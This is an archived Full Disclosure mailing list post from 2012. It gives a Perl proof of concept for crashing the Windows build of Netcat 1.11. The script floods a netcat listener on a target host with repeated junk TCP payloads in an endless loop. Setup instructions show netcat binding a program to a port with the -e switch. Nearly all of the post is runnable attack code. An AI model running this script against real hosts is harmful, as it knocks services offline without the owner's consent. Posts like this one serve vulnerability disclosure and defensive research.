Full Disclosure mailing list archives
Netcat 1.11 Crash POC
From: kaveh ghaemmaghami <kavehghaemmaghami () googlemail com>
Date: Fri, 13 Jul 2012 04:55:25 -0700
# Exploit Title: Netcat 1.11 Crash POC # crash:http://imageshack.us/photo/my-images/687/47003227.jpg/ # Date: July 13, 2012 # Author: coolkaveh # coolkaveh () rocketmail com # https://twitter.com/coolkaveh # Vendor Homepage: The NT version was written by Weld Pond <weld () vulnwatch org> # Version: 1.11 # Tested on: windows XP SP3 # set your netcat listening on port 222 with -e switch sftp or etc .. # example nc.exe -l -p 2222 -v -e tftp #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Crappy netcat Crash #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/usr/bin/perl -w use IO::Socket; $|=1; sub usage { print "nc.exe -l -p 2222 -v -e tftp"; print "by coolkaveh\n"; print "coolkaveh () rocketmail com\n"; print "usage: perl nc.pl <host> \n"; } $host=shift; $port=shift || "2222"; if(!defined($host)){ print "nc.exe -l -p 2222 -v -e tftp"; print "by coolkaveh\n"; print "coolkaveh () rocketmail com\n"; print "usage: perl nc.pl <host> \n"; exit(0); } @junk=('A'x100); print "Crashing NC !\n"; while (1) { COMMAND_LIST: foreach $cmd (@junk){ LABEL5: $sock1=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30); if(defined($sock1)){ $sock1->send("$cmd"." "."$poc\r\n", 0); } } } _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Netcat 1.11 Crash POC kaveh ghaemmaghami (Jul 13)